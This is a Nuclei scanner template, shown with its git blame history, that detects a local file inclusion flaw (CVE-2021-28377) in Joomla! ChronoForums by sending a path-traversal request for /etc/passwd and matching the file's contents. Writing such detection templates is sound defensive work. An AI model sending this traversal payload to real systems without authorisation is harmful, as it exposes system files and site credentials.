nuclei-templates/http/cves/2021/CVE-2021-28377.yaml

id: CVE-2021-28377

info:
  name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
  reference:
    - https://herolab.usd.de/en/security-advisories/usd-2021-0007/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-28377
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-28377
    cwe-id: CWE-22
    cpe: cpe:2.3:a:chronoengine:chronoforums:*:*:*:*:*:*:*:*
    epss-score: 0.00099
  tags: cve,cve2021,chronoforums,lfi,joomla
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`id: CVE-2021-28377`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Joomla! ChronoForums 2.0.11 - Local File Inclusion`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`author: 0x_Akoko`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`severity: medium`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`reference:`
			`- https://herolab.usd.de/en/security-advisories/usd-2021-0007/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-28377`
			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`cve-id: CVE-2021-28377`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cwe-id: CWE-22`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`cpe: cpe:2.3:a:chronoengine:chronoforums::::::::`
			`epss-score: 0.00099`
Update and rename CVE-2021-28377.yaml to cves/2017/CVE-2021-28377.yaml 2022-04-02 07:53:16 +00:00			`tags: cve,cve2021,chronoforums,lfi,joomla`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Update and rename CVE-2021-28377.yaml to cves/2017/CVE-2021-28377.yaml 2022-04-02 07:53:16 +00:00			`- "root:.*:0:0:"`
Create CVE-2021-28377.yaml 2022-04-01 10:02:22 +00:00
			`- type: status`
			`status:`
			`- 200`